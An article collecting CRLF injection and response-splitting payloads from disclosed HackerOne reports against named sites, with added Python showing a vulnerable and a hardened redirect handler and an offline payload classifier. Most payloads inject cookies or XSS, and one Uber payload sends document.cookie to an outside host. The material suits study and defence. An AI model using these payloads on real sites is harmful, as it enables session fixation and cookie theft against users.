CRLF Injection Tricks Seen in HackerOne Public Reports

A roundup of CRLF injection techniques, collected from disclosed HackerOne reports.

CRLF stands for Carriage Return Line Feed: the pair of control characters carriage return (CR, ASCII 13, \r, %0d) and line feed (LF, ASCII 10, \n, %0a).

In an HTTP message the status line and every header line end with CRLF, and a single empty line (CRLF CRLF) separates the headers from the body. CRLF injection happens when a web application copies user input into a response header (most often Location or Set-Cookie) without rejecting these two characters, so an attacker who puts a CR or LF into the input can terminate the current header and start new ones. In its strongest form, where the attacker can also inject the empty line and a body, this is HTTP response splitting: the client sees a complete second response written by the attacker.

The practical effect is easy to test: add the payload to a request and the injected header (or header value) appears in the response. Check the raw response rather than what the browser renders, because an injected header only matters if it reaches the client intact.

The common exploitation scenario is a crafted link that, when a victim opens it, sets a cookie or another attacker-chosen header on the target's origin (for example a fixed CSRF or session cookie with domain=.example.com). When the injection also controls the body, or can switch off protections with headers such as X-XSS-Protection: 0 together with Content-Type: text/html, CRLF injection turns into XSS, as several of the reports below show. Many modern frameworks refuse CR and LF in header values, so the weak spot is usually custom code, a reverse proxy, or an older stack.
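To make the mechanism concrete, here is an added Python example (it is not from the original article or from any of the reports) of a redirect handler that builds its raw HTTP response itself, first in the vulnerable form and then hardened, plus a lenient response parser that shows where the injected header ends up. The payload constant and the handler names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed payload, modelled on the report URLs collected in this article.
SAMPLE_PAYLOAD = "/%0D%0ASet-Cookie:crlfinjection=crlfinjection"


def build_redirect_vulnerable(next_url: str) -> bytes:
    """Vulnerable: the percent-decoded parameter goes into Location untouched."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {next_url}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


class HeaderInjectionError(ValueError):
    """Raised when a header value contains CR, LF or NUL."""


def safe_header_value(value: str) -> str:
    # Reject rather than strip: a naive strip is easy to get wrong (a bare
    # %0d, a bare %0a or an obsolete tab-folded line may survive it).
    if re.search(r"[\r\n\0]", value):
        raise HeaderInjectionError(f"control character in header value: {value!r}")
    return value


def build_redirect_hardened(next_url: str) -> bytes:
    """Hardened: same handler, but the value is validated before it is emitted."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {safe_header_value(next_url)}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_response(raw: bytes):
    """Parse a raw response the way a lenient client does: a bare CR or a
    bare LF also ends a header line, which is why the %0d-only and %0a-only
    payloads in the reports below still work.  Returns (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = re.split(rb"\r\n|\r|\n", head)
    status = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.decode("latin-1").strip().lower(),
                            value.decode("latin-1").strip()))
    return status, headers, body


def header_names(payload: str, builder) -> list:
    """Decode the payload as the server would, build the response and return
    the header names a client sees, in order."""
    _, headers, _ = parse_response(builder(unquote(payload)))
    return [name for name, _ in headers]


def injected_body(payload: str, builder) -> bytes:
    """Body the client sees; non-empty only when the payload also injects the
    empty line that ends the headers (full response splitting)."""
    return parse_response(builder(unquote(payload)))[2]


def hardened_rejects(payload: str) -> bool:
    """True when the hardened handler refuses to emit the payload."""
    try:
        build_redirect_hardened(unquote(payload))
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    print(header_names(SAMPLE_PAYLOAD, build_redirect_vulnerable))
    # ['location', 'set-cookie', 'content-length']
    print(hardened_rejects(SAMPLE_PAYLOAD))   # True
```

The vulnerable builder turns the single Location header into Location plus an attacker-supplied Set-Cookie; the hardened builder raises instead of emitting anything. Rejecting the value is preferable to stripping CR and LF, because the reports below show that a bare %0d, a bare %0a and a tab-prefixed continuation line all get through filters that only look for the full %0d%0a pair.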

Searching HackerOne for disclosed CRLF reports ...

The payloads from the disclosed reports are collected below (the number in brackets is the HackerOne report ID):

[1038594] https://www.epay.fas.gsa.gov/%0D%0ASet-Cookie:crlfinjection=crlfinjection

[446271] https://ads.twitter.com/subscriptions/mobile/landing?t=%0d%0aSet-Cookie:%20csrf_id=injection%3b

[191380] https://ton.twitter.com/1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest%3B%20Domain%3D.twitter.com%3B%20Path%3D%2F%3B%20Expires%3DSat%2C%2015-Dec-2018%2009%3A45%3A55%20UTC

[52042] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test

[192667]

Chrome PoC: http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

Firefox PoC: http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E

[237357] https://vpn.bitstrips.com/__session_start__/%0aSet-Cookie:malicious_cookie1

[335599] https://mcs.mail.ru/auth/oidc/login?response_type=code&scope=userinfo&client_id=iaas.mail.ru&state=k1qOT59-VhrTIe177aP0PXOouig&redirect_uri=%0d%0aContent-Length:%200%0d%0a%0d%0a9%0d%0a%0d%0a%3Chtml%3E%3Cmarquee%3E%3Cb%3ETEST%3C/b%3E%3C/marquee%3E%3C/html%3E&nonce=ENHHnrgXnfxv0oBAGRKfaXSQOk5VMyA2MT9KCcZSlCM

[177624] https://team.badoo.com/%0d%0adata:text/html;text,%3Csvg%2fonload%3Dprompt%281%29%3E

[53843] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++++++++++……set-cookie:a // this one is an overflow-style bug; the run of + characters is abbreviated here because it is very long, see the report for the full payload

[192749]

Chrome PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

Firefox PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

[217058] https://info.hacker.one/%0d%0a%09headername:%20headervalue

[231508] https://vpn.corp.cuvva.com/__session_start__/%0aSet-Cookie:NEW_COOKIE123

[145128] http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b

[39181] http://www.vimeopro.com/crlftest%0dSet-Cookie:test=test;domain=.vimeopro.com // works in any browser except Firefox

[171473] https://bi.owox.com/%0d%0aMyheader:NewHeader

[234758] https://vpn.mixmax.com/__session_start__/%0aSet-Cookie:malicious_cookie1

[121489] https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E&selectedLanguage=fi&selectedArea=

[183796]

https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=

[25275] http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io

[39261] https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com

[181939]

POST /tests/ HTTP/1.1
Host: qpt.mail.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 245

action=answer&test_id=149&qpt_question_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru/%0aSet-Cookie=test=test%3bdomain=.mail.ru%3b&qpt_result_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru%2Ftest.html&question_id=1406&qpt_test_state=1406%3A0&answer=6449

[114198] https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;

[154306] https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;

[67386]

http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/

[79552] http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

[99268] https://otus.p.mail.ru/brat/ajax.cgi?action=downloadFile&collection=/&detailed=True&dir=True&extension=xml&filters=content::content_reference::omission::distortion::nonsense::inexact::unclear::content_cohesion::ThemeRheme::logic::content_pragmatics::register::use::&protocol=1&document=%0d%0aCRLF_Vulnerabled:true%00

[154275] http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;

[15492]

http://corp.mail.ru/%0dSet-Cookie:test=test;domain=.mail.ru;

http://corp.mail.ru/%0dSet-Cookie:csrftoken=x;domain=.mail.ru;

[332708] https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru

[66257] https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;

[138332] http://torg.mail.ru//xxx%0ASet-Cookie:test=test;domain=.mail.ru

[36105] http://ishop.qiwi.com/test%0dSet-Cookie:test2=test;domain=.qiwi.com

[66386]

http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;

https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;

[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo

[66391] https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com

[125984]

https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!-- // the payload ends with an HTML comment opener; the original post noted that its publishing platform dropped one of the two dashes

https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!-- // same note: the comment opener originally had two dashes

[13314] https://crowdin.khanacademy.org/page/in-context-localization?email=%0d%0a%20InjectedBy:BigBear
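To see what the variants in the list above have in common, here is an added Python classifier (it is not part of the original article or of any of the reports) that percent-decodes a report URL, simulates the server behaviour these payloads count on, and reports which line-break trick is used, which header names would be injected, and whether a body is injected too. The payloads in EXAMPLES are copied from the list above; the low-byte truncation applied to the %E5%98%8A%E5%98%8D entries is an assumed server behaviour, simulated here rather than observed on any host.

```python
import re
from urllib.parse import unquote

# Payloads copied from the report list above (used here as test subjects;
# nothing is sent anywhere, the server side is simulated).
EXAMPLES = {
    "gsa": "https://www.epay.fas.gsa.gov/%0D%0ASet-Cookie:crlfinjection=crlfinjection",
    "ubnt": "http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b",
    "twitter": "https://ton.twitter.com/1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest%3B%20Domain%3D.twitter.com%3B%20Path%3D%2F%3B%20Expires%3DSat%2C%2015-Dec-2018%2009%3A45%3A55%20UTC",
    "h1": "https://info.hacker.one/%0d%0a%09headername:%20headervalue",
    "starbucks": "http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e",
}

BREAK_RE = re.compile(r"\r\n|\n\r|\r|\n")
BREAK_NAMES = {"\r\n": "CRLF", "\n\r": "LFCR", "\r": "CR", "\n": "LF"}
HEADER_RE = re.compile(r"^[ \t]*([A-Za-z][A-Za-z0-9-]*)[ \t]*:")


def low_byte_truncate(text: str) -> str:
    """U+560A and U+560D end in the bytes 0x0A and 0x0D.  A backend that keeps
    only the low 8 bits of each code point (the assumed behaviour behind the
    %E5%98%8A%E5%98%8D payloads) therefore turns them into LF and CR."""
    return "".join(chr(ord(c) & 0xFF) for c in text)


def classify(url: str) -> dict:
    # Keep path and query only, then percent-decode once as a server would.
    target = re.sub(r"^[a-z][a-z0-9+.-]*://[^/?#]*", "", url, flags=re.I)
    decoded = unquote(target)
    unicode_trick = any(ord(c) > 0xFF for c in decoded)
    if unicode_trick:
        decoded = low_byte_truncate(decoded)

    breaks = []                      # distinct line-break tokens, in order seen
    for tok in BREAK_RE.findall(decoded):
        name = BREAK_NAMES[tok]
        if name not in breaks:
            breaks.append(name)

    lines = BREAK_RE.split(decoded)
    headers, folded, body_lines, full_response = [], False, None, False
    for line in lines[1:]:           # lines[0] is the untouched prefix
        if body_lines is not None:
            body_lines.append(line)
            continue
        if line == "":               # empty line: everything after it is body
            body_lines = []
            continue
        if line.startswith("HTTP/1."):
            full_response = True     # attacker supplies a whole second response
            continue
        m = HEADER_RE.match(line)
        if m:
            headers.append(m.group(1).lower())
            # A leading tab or space makes this an obsolete line fold: a strict
            # parser appends it to the previous header, a lenient one does not.
            folded = folded or line[0] in " \t"
    return {
        "breaks": breaks,
        "unicode_low_byte": unicode_trick,
        "headers": headers,
        "obs_fold": folded,
        "has_body": body_lines is not None,
        "body": "\n".join(body_lines) if body_lines else "",
        "full_response": full_response,
    }


if __name__ == "__main__":
    for name, url in EXAMPLES.items():
        info = classify(url)
        print(f"{name:10} breaks={info['breaks']} headers={info['headers']} "
              f"unicode={info['unicode_low_byte']} fold={info['obs_fold']} "
              f"body={info['has_body']}")
```

The breakdown shows why the list looks so varied. Bare %0d (the ubnt, vimeopro, dropbox and mail.ru entries) and bare %0a (the __session_start__ entries) both work because browsers end a header line on either character. %E5%98%8A%E5%98%8D is 嘊嘍 (U+560A U+560D), whose low bytes are LF and CR, so it survives filters that only look for the literal control characters. The %09 in the info.hacker.one payload is a tab, which turns the injected line into an obsolete line fold. In the Starbucks PoC the line 23 is a hex chunk size: 0x23 = 35 bytes, exactly the length of <svg onload=alert(document.domain)>, so the injected body is framed as chunked data ending in the 0 chunk. The Uber payloads go furthest, injecting a second status line and a body, which is response splitting proper.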

Originally published on FreeBuf.COM
